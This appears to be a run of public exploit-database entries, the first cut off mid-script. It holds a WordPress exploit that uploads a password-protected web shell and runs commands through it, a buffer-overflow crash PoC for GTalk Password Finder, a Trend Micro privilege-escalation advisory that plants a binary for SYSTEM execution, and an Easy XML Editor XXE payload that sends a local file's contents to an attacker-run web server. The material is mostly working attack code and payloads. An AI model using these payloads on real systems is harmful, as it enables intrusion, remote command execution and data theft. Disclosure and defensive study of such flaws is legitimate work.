{"wordpress_test_cookie":"WP+Cookie+check","wordpress_5c016e8f0f95f039102cbe8366c5c7f3":"secforce%7C1579345389%7CVEj3PYaEDRwiYHj9dvd3H2813BfDsqNxAJQyF0N4nOa%7Ccd8ab0bf244d404dc2b3ec55335545553a8017c254357f76b061345dfa751545","wordpress_logged_in_5c016e8f0f95f039102cbe8366c5c7f3":"secforce%7C1579345389%7CfoMJPKzwmHvHzKkdwvUcxUIXU327HQWR6Lrv1oP6qzA%7C2531f7ca8075fd9e0a56293dd7a627b2de1ddfe49ff34be9f0835e2a5e4cccb4","wp-settings-time-1":"1579176444"} response = session.post(url+"/wp-admin/update.php", data=paramsPost, files=paramsMultipart, params=paramsGet, headers=headers, cookies=cookies) print ("Now you have a shell! ") command = "" while(1 and (command != "exit")): command = str(raw_input()) response = session.get(url+"/wp-content/plugins/shell/shell.php?pass=mak3ithapp3n&cmd="+command, verify=False) print(response.content) print "Remember to delete the shell.php :-)" else: print "There was an error :("

# Exploit Title: GTalk Password Finder 2.2.1 - 'Key' Denial of Service (PoC) # Exploit Author: Ismail Tasdelen # Exploit Date: 2020-01-16 # Vendor Homepage : http://www.nsauditor.com/ # Link Software : http://www.nsauditor.com/downloads/gpwdfinder_setup.exe # Tested on OS: Windows 10 # CVE : N/A ''' Proof of Concept (PoC): ======================= 1.Download and install GTalk Password Finder 2.Run the python operating script that will create a file (poc.txt) 3.Run the software "Register -> Enter Registration Code 4.Copy and paste the characters in the file (poc.txt) 5.Paste the characters in the field 'Key' and click on 'Ok' 6.GTalk Password Finder Crashed ''' #!/usr/bin/python buffer = "A" * 1000 payload = buffer try: f=open("poc.txt","w") print("[+] Creating %s bytes evil payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")

# Exploit Title: Trend Micro Maximum Security 2019 - Privilege Escalation # Date: 2020-1-16 # Exploit Author: hyp3rlinx # Vendor Homepage: www.trendmicro.com # Version: Platform Microsoft Windows, Premium Security 2019 (v15), Maximum Security 2019 (v15) # Internet Security 2019 (v15), Antivirus + Security 2019 (v15) [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-SECURITY-CONSUMER-PERSISTENT-ARBITRARY-CODE-EXECUTION.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.trendmicro.com [Product(s)] Trend Micro Security (Consumer) Multiple Products Trend Micro Security provides comprehensive protection for your devices. This includes protection against ransomware, viruses, malware, spyware, and identity theft. [Vulnerability Type] Persistent Arbitrary Code Execution [CVE Reference] CVE-2019-20357 [CVSSv3 Scores: 6.7] [Security Issue] Trend Micro Security can potentially allow an attackers to use a malicious program to escalate privileges to SYSTEM integrity and attain persistence on a vulnerable system. [Product Affected Versions] Platform Microsoft Windows Premium Security 2019 (v15) and 2020 (v16) Maximum Security 2019 (v15) and 2020 (v16) Internet Security 2019 (v15) and 2020 (v16) Antivirus + Security 2019 (v15) and 2020 (v16) [References] https://esupport.trendmicro.com/en-us/home/pages/technical-support/1124099.aspx [Exploit/POC] Compile C test code "Program.c" void main(void){ puts("Done!"); system("pause"); } 1) Place under c:\ dir. 2) Reboot the machine, the coreServiceShell.exe service loads and executes our binary with SYSTEM integrity. [Network Access] Local [Severity] Medium [Disclosure Timeline] Vendor Notification: October 8, 2019 vendor advisory: January 15, 2020 January 16, 2020 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

# Exploit Title: Easy XML Editor 1.7.8 - XML External Entity Injection # Exploit Author: Javier Olmedo # Date: 2018-11-21 # Vendor: Richard Wuerflein # Software Link: https://www.edit-xml.com/Easy_XML_Editor.exe # Affected Version: 1.7.8 and before # Patched Version: unpatched # Category: Local # Platform: XML # Tested on: Windows 10 Pro # CWE: https://cwe.mitre.org/data/definitions/611.html # CVE: 2019-19031 # References: # https://hackpuntes.com/cve-2019-19031-easy-xml-editor-1-7-8-inyeccion-xml/ # 1. Technical Description # Easy XML Editor version 1.7.8 and before are affected by XML External Entity Injection vulnerability # through the malicious XML file. This allows a malicious user to read arbitrary files. # 2. Proof Of Concept (PoC) # 2.1 Start a webserver to receive the connection. python -m SimpleHTTPServer 80 # 2.2 Upload the payload.dtd file to your web server. <?xml version="1.0" encoding="UTF-8"?> <!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:80/?%file;'>"> %all; # 2.3 Create a SECRET.TXT file with any content in desktop. # 2.4 Open poc.xml <?xml version="1.0"?> <!DOCTYPE test [ <!ENTITY % file SYSTEM "file:///C:\Users\<USER>\Desktop\secret.txt"> <!ENTITY % dtd SYSTEM "http://localhost:80/payload.dtd"> %dtd;]> <pwn>&send;</pwn> # 2.5 Your web server will receive a request with the contents of the secret.txt file Serving HTTP on 0.0.0.0 port 8000 ... 192.168.100.23 - - [11/Nov/2019 08:23:52] "GET /payload.dtd HTTP/1.1" 200 - 192.168.100.23 - - [11/Nov/2019 08:23:52] "GET /?THIS%20IS%20A%20SECRET%20FILE HTTP/1.1" 200 - # 3. Timeline # 13, november 2019 - [RESEARCHER] Discover # 13, november 2019 - [RESEARCHER] Report to vendor support # 14, november 2019 - [DEVELOPER] Unrecognized vulnerability # 15, november 2019 - [RESEARCHER] Detailed vulnerability report # 22, november 2019 - [RESEARCHER] Public disclosure # 4. Disclaimer # The information contained in this notice is provided without any guarantee of use or otherwise. # The redistribution of this notice is explicitly permitted for insertion into vulnerability # databases, provided that it is not modified and due credit is granted to the author. # The author prohibits the malicious use of the information contained herein and accepts no responsibility. # All content (c) # Javier Olmedo